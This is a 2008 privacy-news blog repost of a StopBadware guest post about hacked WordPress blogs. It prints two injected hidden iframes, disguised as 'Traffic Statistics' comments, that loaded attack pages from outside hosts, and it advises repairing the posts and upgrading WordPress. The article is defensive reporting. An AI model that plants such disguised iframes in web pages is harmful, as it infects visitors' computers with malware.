Privacy Digest

News that can impact your privacy.
Login/Register
What is OpenID?
  • Log in using OpenID
  • Cancel OpenID login
  • Create new account
  • Request new password
Home Blogs MacRonin's blog
    • FAQ
    • Wishlists
    • Contact
    • Categories/RSS

Bookmark Us

Bookmark Privacy Digest 
Bookmark This Page 

Syndicate

Syndicate content
more

Advertisements

Tracking System
Tracking System
Private Detectives
Quality Security Services in California
Fleet Management
Hosting

Popular content

Last viewed:

  • If You Run a Red Light, Will Everyone Know?
  • Editorial: ICANN's WHOIS Policy Shift Would Be Criminal Negligence
  • Printer dots raise privacy concerns - Tracking what you write
  • DARPA Contract Description Hints at Advanced Video Spying
  • What Happened to the site? It looks different.
  • Happy Anniversary from the Homeland Civil Liberties Union!
  • House Intel Committee to Investigate NSA Spying

tags in Topics

Activists Alert Anonymity Companies Congress Copyright Court (US) Databases Data Mining Editorial EFF Entertainment Exploits Fourth Amendment Government Hmmm ID Infrastructure Law Enforcement Laws Politics Privacy Remember Reports Rights Security Spin Zone Surveillance Telecommunications Tracking
more tags

View blog authority
Congressional Research
Broadcast Flag

StopBadware discussion group sees flurry of hacked WordPress blogs

Submitted by MacRonin on March 11, 2008 - 9:54am
  • Exploits
  • Hmmm
  • Open Source
  • Privacy
  • Software
  • Weblog

StopBadware discussion group sees flurry of hacked WordPress blogs - Via StopBadware Blog:

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->




<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren’t put on the pages by the authors, and they’re not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor’s computer with the virus JS_PSYME.XP.

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It’s not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at Secunia.

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.

(Read Original Article - Via StopBadware Blog.)

Bookmark/Search this post with:
  • Twitter Twitter
  • Digg Digg
  • StumbleUpon StumbleUpon
  • Technorati Technorati
  • del.icio.us del.icio.us
  • Facebook Facebook
  • Furl Furl
  • LinkedIn LinkedIn
  • Yahoo Yahoo
  • MacRonin's blog
  • Add new comment

Recent blog posts

  • In Bid to Sway Sales, Cameras Track Shoppers
  • Unprecedented 25-Year Sentence Sought for TJX Hacker
  • EFF Appeals Dismissal of Warrantless Wiretapping Case
  • Viacom Makes Its Case Against Yesterday's YouTube
  • Obama supports Senators draft plan to rework U.S. immigration policy - Includes National Biometric ID card for all.
  • Domain Names Can't Defend Themselves
  • Hacker Disables More Than 100 Cars Remotely
  • Judges Approves $9.5 Million Facebook ‘Beacon’ Accord
  • Hooking Up The Big Brother Machine... And Fighting It
  • Court: State Can Dump Non-Sex Offenders Into Registry
more

Performancing Metrics

Compilation © Copyright 1997-2010 Paul Hardwick, with Web Hosting provided by MacRonin.com.